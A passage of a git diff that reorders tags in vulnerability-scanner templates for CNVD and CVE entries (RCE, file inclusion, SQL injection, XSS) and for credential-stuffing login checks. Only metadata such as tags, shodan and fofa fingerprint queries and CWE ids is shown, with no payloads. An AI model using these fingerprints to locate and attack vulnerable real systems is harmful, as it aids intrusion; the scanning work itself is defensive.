+ tags: cnvd2019,cnvd,zhiyuan,rce,intrusive
http:
- raw:
diff --git a/http/cnvd/2019/CNVD-2019-32204.yaml b/http/cnvd/2019/CNVD-2019-32204.yaml
index 6d38dac2e0..86e936121d 100644
--- a/http/cnvd/2019/CNVD-2019-32204.yaml
+++ b/http/cnvd/2019/CNVD-2019-32204.yaml
@@ -13,7 +13,7 @@ info:
cwe-id: CWE-77
metadata:
max-request: 1
- tags: fanwei,cnvd,cnvd2019,rce
+ tags: cnvd,cnvd2019,fanwei,rce
http:
- raw:
diff --git a/http/cnvd/2020/CNVD-2020-23735.yaml b/http/cnvd/2020/CNVD-2020-23735.yaml
index f4faaa0ca9..02f5e6750d 100644
--- a/http/cnvd/2020/CNVD-2020-23735.yaml
+++ b/http/cnvd/2020/CNVD-2020-23735.yaml
@@ -13,7 +13,7 @@ info:
cwe-id: CWE-22
metadata:
max-request: 1
- tags: xunchi,lfi,cnvd,cnvd2020
+ tags: cnvd,cnvd2020,xunchi,lfi
http:
- method: GET
diff --git a/http/cnvd/2020/CNVD-2020-56167.yaml b/http/cnvd/2020/CNVD-2020-56167.yaml
index 24c8d479d3..73d8cd34c1 100644
--- a/http/cnvd/2020/CNVD-2020-56167.yaml
+++ b/http/cnvd/2020/CNVD-2020-56167.yaml
@@ -10,7 +10,7 @@ info:
- https://securityforeveryone.com/tools/ruijie-smartweb-default-password-scanner
metadata:
max-request: 1
- tags: ruijie,default-login,cnvd,cnvd2020
+ tags: cnvd,cnvd2020,ruijie,default-login
http:
- method: POST
diff --git a/http/cnvd/2020/CNVD-2020-62422.yaml b/http/cnvd/2020/CNVD-2020-62422.yaml
index 6493d90249..9ec8060004 100644
--- a/http/cnvd/2020/CNVD-2020-62422.yaml
+++ b/http/cnvd/2020/CNVD-2020-62422.yaml
@@ -9,7 +9,7 @@ info:
- https://blog.csdn.net/m0_46257936/article/details/113150699
metadata:
max-request: 1
- tags: lfi,cnvd,cnvd2020,seeyon
+ tags: cnvd,cnvd2020,lfi,seeyon
http:
- method: GET
diff --git a/http/cnvd/2020/CNVD-2020-63964.yaml b/http/cnvd/2020/CNVD-2020-63964.yaml
index 7ca0aa2ddb..6375f4e6ca 100644
--- a/http/cnvd/2020/CNVD-2020-63964.yaml
+++ b/http/cnvd/2020/CNVD-2020-63964.yaml
@@ -12,7 +12,7 @@ info:
max-request: 1
shodan-query: http.favicon.hash:-1298131932
fofa-query: jshERP-boot
- tags: cnvd,cnvd2022,jsherp,disclosure
+ tags: cnvd,cnvd2020,jsherp,disclosure
http:
- method: GET
diff --git a/http/cnvd/2020/CNVD-2020-68596.yaml b/http/cnvd/2020/CNVD-2020-68596.yaml
index 4f44d8c2ed..220e3c38de 100644
--- a/http/cnvd/2020/CNVD-2020-68596.yaml
+++ b/http/cnvd/2020/CNVD-2020-68596.yaml
@@ -13,7 +13,7 @@ info:
cwe-id: CWE-22
metadata:
max-request: 3
- tags: weiphp,lfi,cnvd,cnvd2020
+ tags: cnvd,cnvd2020,weiphp,lfi
http:
- raw:
diff --git a/http/cnvd/2021/CNVD-2021-01931.yaml b/http/cnvd/2021/CNVD-2021-01931.yaml
index 5f5c67e5af..7e97d32f91 100644
--- a/http/cnvd/2021/CNVD-2021-01931.yaml
+++ b/http/cnvd/2021/CNVD-2021-01931.yaml
@@ -13,7 +13,7 @@ info:
cwe-id: CWE-22
metadata:
max-request: 2
- tags: ruoyi,lfi,cnvd,cnvd2021
+ tags: cnvd,cnvd2021,ruoyi,lfi
http:
- method: GET
diff --git a/http/cnvd/2021/CNVD-2021-09650.yaml b/http/cnvd/2021/CNVD-2021-09650.yaml
index 5845b025f9..ac55e53af1 100644
--- a/http/cnvd/2021/CNVD-2021-09650.yaml
+++ b/http/cnvd/2021/CNVD-2021-09650.yaml
@@ -15,7 +15,7 @@ info:
cwe-id: CWE-77
metadata:
max-request: 1
- tags: ruijie,cnvd,cnvd2021,rce
+ tags: cnvd,cnvd2021,ruijie,rce
http:
- raw:
diff --git a/http/cnvd/2021/CNVD-2021-10543.yaml b/http/cnvd/2021/CNVD-2021-10543.yaml
index 55ae286f3c..cac7a97ec8 100644
--- a/http/cnvd/2021/CNVD-2021-10543.yaml
+++ b/http/cnvd/2021/CNVD-2021-10543.yaml
@@ -13,7 +13,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 1
- tags: config,exposure,cnvd,cnvd2021
+ tags: cnvd,cnvd2021,config,exposure
http:
- method: GET
diff --git a/http/cnvd/2021/CNVD-2021-14536.yaml b/http/cnvd/2021/CNVD-2021-14536.yaml
index f362383dbe..924ad366bf 100644
--- a/http/cnvd/2021/CNVD-2021-14536.yaml
+++ b/http/cnvd/2021/CNVD-2021-14536.yaml
@@ -14,7 +14,7 @@ info:
metadata:
max-request: 1
fofa-query: title="RG-UAC登录页面"
- tags: ruijie,cnvd,cnvd2021,disclosure
+ tags: cnvd2021,cnvd,ruijie,disclosure
http:
- method: GET
diff --git a/http/cnvd/2021/CNVD-2021-15822.yaml b/http/cnvd/2021/CNVD-2021-15822.yaml
index 2f2def8649..597ea9c11a 100644
--- a/http/cnvd/2021/CNVD-2021-15822.yaml
+++ b/http/cnvd/2021/CNVD-2021-15822.yaml
@@ -13,7 +13,7 @@ info:
max-request: 1
shodan-query: title:"ShopXO企业级B2C电商系统提供商"
fofa-query: app="ShopXO企业级B2C电商系统提供商"
- tags: shopxo,lfi,cnvd,cnvd2021
+ tags: cnvd2021,cnvd,shopxo,lfi
http:
- raw:
diff --git a/http/cnvd/2021/CNVD-2021-15824.yaml b/http/cnvd/2021/CNVD-2021-15824.yaml
index 07bffc67c6..0115ee56ff 100644
--- a/http/cnvd/2021/CNVD-2021-15824.yaml
+++ b/http/cnvd/2021/CNVD-2021-15824.yaml
@@ -15,7 +15,7 @@ info:
cwe-id: CWE-79
metadata:
max-request: 1
- tags: empirecms,cnvd,cnvd2021,xss,domxss
+ tags: cnvd2021,cnvd,empirecms,xss,domxss
http:
- method: GET
diff --git a/http/cnvd/2021/CNVD-2021-17369.yaml b/http/cnvd/2021/CNVD-2021-17369.yaml
index 5b6c1cc0ff..6e19586a20 100644
--- a/http/cnvd/2021/CNVD-2021-17369.yaml
+++ b/http/cnvd/2021/CNVD-2021-17369.yaml
@@ -13,7 +13,7 @@ info:
cwe-id: CWE-522
metadata:
max-request: 1
- tags: ruijie,disclosure,cnvd,cnvd2021
+ tags: cnvd2021,cnvd,ruijie,disclosure
http:
- method: GET
diff --git a/http/cnvd/2021/CNVD-2021-26422.yaml b/http/cnvd/2021/CNVD-2021-26422.yaml
index 33197c44fe..4bc79fdbd8 100644
--- a/http/cnvd/2021/CNVD-2021-26422.yaml
+++ b/http/cnvd/2021/CNVD-2021-26422.yaml
@@ -14,7 +14,7 @@ info:
cwe-id: CWE-77
metadata:
max-request: 1
- tags: eyoumail,rce,cnvd,cnvd2021
+ tags: cnvd2021,cnvd,eyoumail,rce
http:
- raw:
diff --git a/http/cnvd/2021/CNVD-2021-28277.yaml b/http/cnvd/2021/CNVD-2021-28277.yaml
index cbb2bb479f..52bf601806 100644
--- a/http/cnvd/2021/CNVD-2021-28277.yaml
+++ b/http/cnvd/2021/CNVD-2021-28277.yaml
@@ -15,7 +15,7 @@ info:
metadata:
max-request: 2
fofa-query: app="Landray OA system"
- tags: landray,lfi,cnvd,cnvd2021
+ tags: cnvd,cnvd2021,landray,lfi
http:
- raw:
diff --git a/http/cnvd/2021/CNVD-2021-30167.yaml b/http/cnvd/2021/CNVD-2021-30167.yaml
index 374565249b..fa21625dc4 100644
--- a/http/cnvd/2021/CNVD-2021-30167.yaml
+++ b/http/cnvd/2021/CNVD-2021-30167.yaml
@@ -15,7 +15,7 @@ info:
cwe-id: CWE-77
metadata:
max-request: 2
- tags: cnvd,cnvd2021,beanshell,rce,yonyou
+ tags: cnvd2021,cnvd,beanshell,rce,yonyou
http:
- raw:
diff --git a/http/cnvd/2021/CNVD-2021-32799.yaml b/http/cnvd/2021/CNVD-2021-32799.yaml
index 7511eb7eaf..8fa158edc9 100644
--- a/http/cnvd/2021/CNVD-2021-32799.yaml
+++ b/http/cnvd/2021/CNVD-2021-32799.yaml
@@ -14,7 +14,7 @@ info:
verified: true
max-request: 1
fofa-query: app="360新天擎"
- tags: cnvd,cnvd2021,360,xintianqing,sqli
+ tags: cnvd2021,cnvd,360,xintianqing,sqli
http:
- method: GET
diff --git a/http/cnvd/2021/CNVD-2021-33202.yaml b/http/cnvd/2021/CNVD-2021-33202.yaml
index c46db387d1..503c3a173e 100755
--- a/http/cnvd/2021/CNVD-2021-33202.yaml
+++ b/http/cnvd/2021/CNVD-2021-33202.yaml
@@ -13,7 +13,7 @@ info:
verified: true
max-request: 1
fofa-query: app="泛微-协同办公OA"
- tags: cnvd,cnvd2021,e-cology,sqli
+ tags: cnvd2021,cnvd,e-cology,sqli
variables:
num: "999999999"
diff --git a/http/cnvd/2021/CNVD-2021-41972.yaml b/http/cnvd/2021/CNVD-2021-41972.yaml
index 3d1dbae265..8d25493eb7 100644
--- a/http/cnvd/2021/CNVD-2021-41972.yaml
+++ b/http/cnvd/2021/CNVD-2021-41972.yaml
@@ -14,7 +14,7 @@ info:
max-request: 1
shodan-query: http.favicon.hash:-1595726841
fofa-query: body="Login @ Reporter"
- tags: cnvd,cnvd2021,acenet,acereporter,lfi
+ tags: cnvd2021,cnvd,acenet,acereporter,lfi
variables:
filename: "{{to_lower(rand_text_alpha(5))}}"
diff --git a/http/cnvd/2021/CNVD-2021-43984.yaml b/http/cnvd/2021/CNVD-2021-43984.yaml
index 0c25f5b57f..9024670d97 100644
--- a/http/cnvd/2021/CNVD-2021-43984.yaml
+++ b/http/cnvd/2021/CNVD-2021-43984.yaml
@@ -13,7 +13,7 @@ info:
verified: true
max-request: 1
fofa-query: "迈普通信技术股份有限公司"
- tags: cnvd,cnvd2021,mpsec,maipu,lfi,isg
+ tags: cnvd2021,cnvd,mpsec,maipu,lfi,isg
http:
- method: GET
diff --git a/http/cnvd/2021/CNVD-2021-49104.yaml b/http/cnvd/2021/CNVD-2021-49104.yaml
index e34fe54666..ce7c6c0907 100644
--- a/http/cnvd/2021/CNVD-2021-49104.yaml
+++ b/http/cnvd/2021/CNVD-2021-49104.yaml
@@ -15,7 +15,7 @@ info:
cwe-id: CWE-434
metadata:
max-request: 2
- tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive
+ tags: cnvd2021,cnvd,pan,micro,fileupload,intrusive
http:
- raw:
diff --git a/http/cnvd/2022/CNVD-2022-03672.yaml b/http/cnvd/2022/CNVD-2022-03672.yaml
index 3217c86934..8df60c0c94 100644
--- a/http/cnvd/2022/CNVD-2022-03672.yaml
+++ b/http/cnvd/2022/CNVD-2022-03672.yaml
@@ -16,7 +16,7 @@ info:
cwe-id: CWE-77
metadata:
max-request: 2
- tags: cnvd,cnvd2020,sunflower,rce
+ tags: cnvd,cnvd2022,sunflower,rce
http:
- raw:
diff --git a/http/cnvd/2023/CNVD-2023-08743.yaml b/http/cnvd/2023/CNVD-2023-08743.yaml
index 7213e46a4a..54dd2820f9 100644
--- a/http/cnvd/2023/CNVD-2023-08743.yaml
+++ b/http/cnvd/2023/CNVD-2023-08743.yaml
@@ -12,7 +12,7 @@ info:
verified: true
max-request: 1
fofa-query: title="人力资源信息管理系统"
- tags: cnvd,cnvd2023,hongjing,hcm
+ tags: cnvd2023,cnvd,hongjing,hcm,sqli
http:
- raw:
diff --git a/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml b/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml
index dca8671210..9f22b6be01 100644
--- a/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml
+++ b/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml
@@ -9,7 +9,7 @@ info:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
max-request: 2
- tags: login-check,atechmedia,codebase,creds-stuffing
+ tags: cloud,creds-stuffing,login-check,atechmedia,codebase
self-contained: true
diff --git a/http/credential-stuffing/cloud/atlassian-login-check.yaml b/http/credential-stuffing/cloud/atlassian-login-check.yaml
index d29e8ffc78..8e0e37bb9e 100644
--- a/http/credential-stuffing/cloud/atlassian-login-check.yaml
+++ b/http/credential-stuffing/cloud/atlassian-login-check.yaml
@@ -9,7 +9,7 @@ info:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
max-request: 1
- tags: login-check,atlassian,creds-stuffing
+ tags: cloud,creds-stuffing,login-check,atlassian
self-contained: true
diff --git a/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml b/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml
index 5b7bd4c129..e29482d27d 100644
--- a/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml
+++ b/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml
@@ -9,7 +9,7 @@ info:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
max-request: 1
- tags: login-check,avnil-pdf,creds-stuffing
+ tags: cloud,creds-stuffing,login-check,avnil-pdf
self-contained: true
diff --git a/http/credential-stuffing/cloud/chefio-login-check.yaml b/http/credential-stuffing/cloud/chefio-login-check.yaml
index a931eaf337..ea8bb0b490 100644
--- a/http/credential-stuffing/cloud/chefio-login-check.yaml
+++ b/http/credential-stuffing/cloud/chefio-login-check.yaml
@@ -9,7 +9,7 @@ info:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
max-request: 1
- tags: login-check,chefio,creds-stuffing
+ tags: cloud,creds-stuffing,login-check,chefio
self-contained: true
diff --git a/http/credential-stuffing/cloud/codepen-login-check.yaml b/http/credential-stuffing/cloud/codepen-login-check.yaml
index 23ee8582c6..6668ad2ada 100644
--- a/http/credential-stuffing/cloud/codepen-login-check.yaml
+++ b/http/credential-stuffing/cloud/codepen-login-check.yaml
@@ -9,7 +9,7 @@ info:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
max-request: 2
- tags: login-check,codepen,creds-stuffing
+ tags: creds-stuffing,login-check,cloud,codepen
self-contained: true
diff --git a/http/credential-stuffing/cloud/datadog-login-check.yaml b/http/credential-stuffing/cloud/datadog-login-check.yaml
index bd934a04ed..a3ddc7cecd 100644
--- a/http/credential-stuffing/cloud/datadog-login-check.yaml
+++ b/http/credential-stuffing/cloud/datadog-login-check.yaml
@@ -9,7 +9,7 @@ info:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
max-request: 2
- tags: login-check,datadog,creds-stuffing
+ tags: cloud,creds-stuffing,login-check,datadog
self-contained: true
diff --git a/http/credential-stuffing/cloud/docker-hub-login-check.yaml b/http/credential-stuffing/cloud/docker-hub-login-check.yaml
index bdb56538ef..13e87da37f 100644
--- a/http/credential-stuffing/cloud/docker-hub-login-check.yaml
+++ b/http/credential-stuffing/cloud/docker-hub-login-check.yaml
@@ -9,7 +9,7 @@ info:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
max-request: 1
- tags: login-check,docker,creds-stuffing
+ tags: creds-stuffing,login-check,cloud,docker
self-contained: true
diff --git a/http/credential-stuffing/cloud/gitea-login-check.yaml b/http/credential-stuffing/cloud/gitea-login-check.yaml
index f35246fd37..ef8b876ffa 100644
--- a/http/credential-stuffing/cloud/gitea-login-check.yaml
+++ b/http/credential-stuffing/cloud/gitea-login-check.yaml
@@ -9,7 +9,7 @@ info:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
max-request: 1
- tags: login-check,gitea,creds-stuffing
+ tags: cloud,creds-stuffing,login-check,gitea
self-contained: true
diff --git a/http/credential-stuffing/cloud/github-login-check.yaml b/http/credential-stuffing/cloud/github-login-check.yaml
index fa252b2949..8a448371d8 100644
--- a/http/credential-stuffing/cloud/github-login-check.yaml
+++ b/http/credential-stuffing/cloud/github-login-check.yaml
@@ -9,7 +9,7 @@ info:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
max-request: 2
- tags: login-check,github,creds-stuffing
+ tags: cloud,creds-stuffing,login-check,github
self-contained: true
diff --git a/http/credential-stuffing/cloud/postman-login-check.yaml b/http/credential-stuffing/cloud/postman-login-check.yaml
index 2fcf8c57ab..3ec00e2fda 100644
--- a/http/credential-stuffing/cloud/postman-login-check.yaml
+++ b/http/credential-stuffing/cloud/postman-login-check.yaml
@@ -9,7 +9,7 @@ info:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
max-request: 2
- tags: login-check,postman,creds-stuffing
+ tags: cloud,creds-stuffing,login-check,postman
self-contained: true
diff --git a/http/credential-stuffing/cloud/pulmi-login-check.yaml b/http/credential-stuffing/cloud/pulmi-login-check.yaml
index 368a63678f..5ecbbcfc0f 100644
--- a/http/credential-stuffing/cloud/pulmi-login-check.yaml
+++ b/http/credential-stuffing/cloud/pulmi-login-check.yaml
@@ -9,7 +9,7 @@ info:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
max-request: 1
- tags: login-check,pulmi,creds-stuffing
+ tags: cloud,creds-stuffing,login-check,pulmi
self-contained: true
diff --git a/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml b/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml
index 6e12d090a2..edec06798d 100644
--- a/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml
+++ b/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml
@@ -11,7 +11,7 @@ info:
max-request: 2
shodan-query: product:"GitLab Self-Managed"
fofa-query: product="GitLab"
- tags: login-check,gitlab,creds-stuffing,self-hosted
+ tags: creds-stuffing,login-check,self-hosted,gitlab
variables:
username: "{{username}}"
password: "{{password}}"
diff --git a/http/credential-stuffing/self-hosted/grafana-login-check.yaml b/http/credential-stuffing/self-hosted/grafana-login-check.yaml
index af3016bbb2..84806dcbde 100644
--- a/http/credential-stuffing/self-hosted/grafana-login-check.yaml
+++ b/http/credential-stuffing/self-hosted/grafana-login-check.yaml
@@ -11,7 +11,7 @@ info:
max-request: 1
shodan-query: title:"Grafana"
fofa-query: title="Grafana"
- tags: login-check,grafana,creds-stuffing,self-hosted
+ tags: self-hosted,creds-stuffing,login-check,grafana
variables:
username: "{{username}}"
password: "{{password}}"
diff --git a/http/credential-stuffing/self-hosted/jira-login-check.yaml b/http/credential-stuffing/self-hosted/jira-login-check.yaml
index d3d14b37e6..6d0a4a3911 100644
--- a/http/credential-stuffing/self-hosted/jira-login-check.yaml
+++ b/http/credential-stuffing/self-hosted/jira-login-check.yaml
@@ -11,7 +11,7 @@ info:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
fofa-query: product="JIRA"
- tags: login-check,jira,creds-stuffing,self-hosted
+ tags: creds-stuffing,login-check,self-hosted,jira
variables:
username: "{{username}}"
password: "{{password}}"
diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml
index 4cc511bf5f..fbfd5c4f38 100644
--- a/http/cves/2002/CVE-2002-1131.yaml
+++ b/http/cves/2002/CVE-2002-1131.yaml
@@ -27,7 +27,7 @@ info:
max-request: 5
vendor: squirrelmail
product: squirrelmail
- tags: cve2002,edb,xss,squirrelmail,cve
+ tags: cve,cve2002,edb,xss,squirrelmail
http:
- method: GET
diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml
index dd72a4ab41..4f89596f87 100644
--- a/http/cves/2004/CVE-2004-0519.yaml
+++ b/http/cves/2004/CVE-2004-0519.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: sgi
product: propack
- tags: squirrelmail,cve2004,cve,edb,xss,sgi
+ tags: cve,cve2004,squirrelmail,edb,xss,sgi
http:
- method: GET
diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml
index 5f20ec31d2..f96035614d 100644
--- a/http/cves/2005/CVE-2005-2428.yaml
+++ b/http/cves/2005/CVE-2005-2428.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: ibm
product: lotus_domino
- tags: domino,edb,cve,cve2005,ibm
+ tags: cve2005,cve,domino,edb,ibm
http:
- method: GET
diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml
index 20a0675c96..8484e7e2fc 100644
--- a/http/cves/2005/CVE-2005-3344.yaml
+++ b/http/cves/2005/CVE-2005-3344.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: horde
product: horde
- tags: cve,cve2005,horde,unauth
+ tags: cve2005,cve,horde,unauth
http:
- method: GET
diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml
index a7f24f1089..7dcf6fb25b 100644
--- a/http/cves/2005/CVE-2005-3634.yaml
+++ b/http/cves/2005/CVE-2005-3634.yaml
@@ -30,7 +30,7 @@ info:
vendor: sap
product: sap_web_application_server
shodan-query: html:"SAP Business Server Pages Team"
- tags: cve,cve2005,sap,redirect,business
+ tags: cve,cve2005,sap,redirect,business,xss
http:
- method: GET
diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml
index 3ca9ec067a..f02984701a 100644
--- a/http/cves/2005/CVE-2005-4385.yaml
+++ b/http/cves/2005/CVE-2005-4385.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: cofax
product: cofax
- tags: cofax,xss,cve,cve2005
+ tags: cve2005,cve,cofax,xss
http:
- method: GET
diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml
index 4e07c04fa4..a8d89d68dd 100644
--- a/http/cves/2006/CVE-2006-1681.yaml
+++ b/http/cves/2006/CVE-2006-1681.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: cherokee
product: cherokee_httpd
- tags: cherokee,httpd,xss,cve,cve2006
+ tags: cve,cve2006,cherokee,httpd,xss
http:
- method: GET
diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml
index 0b75097769..e8995a3473 100644
--- a/http/cves/2007/CVE-2007-4504.yaml
+++ b/http/cves/2007/CVE-2007-4504.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: joomla
product: rsfiles
- tags: lfi,edb,cve,cve2007,joomla
+ tags: cve2007,cve,lfi,edb,joomla
http:
- method: GET
diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml
index aa28240ef1..cf4cd32efe 100644
--- a/http/cves/2007/CVE-2007-5728.yaml
+++ b/http/cves/2007/CVE-2007-5728.yaml
@@ -28,7 +28,7 @@ info:
vendor: phppgadmin
product: phppgadmin
shodan-query: http.title:"phpPgAdmin"
- tags: cve,cve2007,xss,pgadmin,phppgadmin,edb
+ tags: cve2007,cve,xss,pgadmin,phppgadmin,edb
http:
- method: GET
diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml
index 86cffe969a..976ffed98c 100644
--- a/http/cves/2008/CVE-2008-1059.yaml
+++ b/http/cves/2008/CVE-2008-1059.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: wordpress
product: sniplets_plugin
- tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan
+ tags: cve2008,cve,lfi,wordpress,wp-plugin,wp,sniplets,edb,wpscan
http:
- method: GET
diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml
index 0b16c19cce..21bbe168b3 100644
--- a/http/cves/2008/CVE-2008-1061.yaml
+++ b/http/cves/2008/CVE-2008-1061.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: wordpress
product: sniplets_plugin
- tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
+ tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets
http:
- method: GET
diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml
index 182e4ff960..4d3c34185d 100644
--- a/http/cves/2008/CVE-2008-1547.yaml
+++ b/http/cves/2008/CVE-2008-1547.yaml
@@ -28,7 +28,7 @@ info:
vendor: microsoft
product: exchange_server
shodan-query: http.title:"Outlook"
- tags: cve,cve2008,redirect,owa,exchange,microsoft
+ tags: cve2008,cve,redirect,owa,exchange,microsoft
http:
- method: GET
diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml
index eb2dd50f03..bf4146a6cb 100644
--- a/http/cves/2008/CVE-2008-2398.yaml
+++ b/http/cves/2008/CVE-2008-2398.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: appserv_open_project
product: appserv
- tags: cve,cve2008,xss,appserv_open_project
+ tags: cve2008,cve,xss,appserv_open_project
http:
- method: GET
diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml
index 60ae910df7..c9a8dced50 100644
--- a/http/cves/2008/CVE-2008-4668.yaml
+++ b/http/cves/2008/CVE-2008-4668.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: joomla
product: com_imagebrowser
- tags: cve,cve2008,joomla,lfi,edb
+ tags: cve2008,cve,joomla,lfi,edb
http:
- method: GET
diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml
index bd1125ede7..7923946a87 100644
--- a/http/cves/2008/CVE-2008-4764.yaml
+++ b/http/cves/2008/CVE-2008-4764.yaml
@@ -23,7 +23,7 @@ info:
max-request: 1
vendor: extplorer
product: com_extplorer
- tags: edb,cve,cve2008,joomla,lfi,extplorer
+ tags: cve,cve2008,edb,joomla,lfi,extplorer
http:
- method: GET
diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml
index 2a1765763f..e9d42f36a5 100644
--- a/http/cves/2008/CVE-2008-6080.yaml
+++ b/http/cves/2008/CVE-2008-6080.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: codecall
product: com_ionfiles
- tags: edb,cve,cve2008,joomla,lfi,codecall
+ tags: cve,cve2008,edb,joomla,lfi,codecall
http:
- method: GET
diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml
index bbac849887..44a3009bcc 100644
--- a/http/cves/2008/CVE-2008-6172.yaml
+++ b/http/cves/2008/CVE-2008-6172.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: weberr
product: rwcards
- tags: cve2008,joomla,lfi,edb,cve,weberr
+ tags: cve2008,cve,joomla,lfi,edb,weberr
http:
- method: GET
diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml
index 529ec4dfe5..aff72d5784 100644
--- a/http/cves/2008/CVE-2008-6222.yaml
+++ b/http/cves/2008/CVE-2008-6222.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: joomlashowroom
product: pro_desk_support_center
- tags: cve2008,joomla,lfi,edb,cve,joomlashowroom
+ tags: cve,cve2008,joomla,lfi,edb,joomlashowroom
http:
- method: GET
diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml
index 51f1f21cbc..b6c021c629 100644
--- a/http/cves/2008/CVE-2008-6668.yaml
+++ b/http/cves/2008/CVE-2008-6668.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: dirk_bartley
product: nweb2fax
- tags: cve2008,nweb2fax,lfi,traversal,edb,cve,dirk_bartley
+ tags: cve,cve2008,nweb2fax,lfi,traversal,edb,dirk_bartley
http:
- method: GET
diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml
index 007940e9e3..1bb3569bf8 100644
--- a/http/cves/2009/CVE-2009-0545.yaml
+++ b/http/cves/2009/CVE-2009-0545.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: zeroshell
product: zeroshell
- tags: edb,cve,cve2009,zeroshell,kerbynet,rce
+ tags: cve,cve2009,edb,zeroshell,kerbynet,rce
http:
- method: GET
diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml
index 646906dc75..c08cd09c05 100644
--- a/http/cves/2009/CVE-2009-1151.yaml
+++ b/http/cves/2009/CVE-2009-1151.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: phpmyadmin
product: phpmyadmin
- tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce
+ tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce
http:
- raw:
diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml
index 6f335992fb..dacb8d5462 100644
--- a/http/cves/2009/CVE-2009-1496.yaml
+++ b/http/cves/2009/CVE-2009-1496.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: joomla
product: joomla
- tags: joomla,lfi,edb,cve,cve2009
+ tags: cve2009,cve,joomla,lfi,edb
http:
- method: GET
diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml
index 66e6bfa43e..fc80f46f2f 100644
--- a/http/cves/2009/CVE-2009-1558.yaml
+++ b/http/cves/2009/CVE-2009-1558.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: cisco
product: wvc54gca
- tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb
+ tags: cve2009,cve,iot,linksys,camera,traversal,lfi,cisco,firmware,edb
http:
- method: GET
diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml
index ce82b92d4a..db328550fe 100644
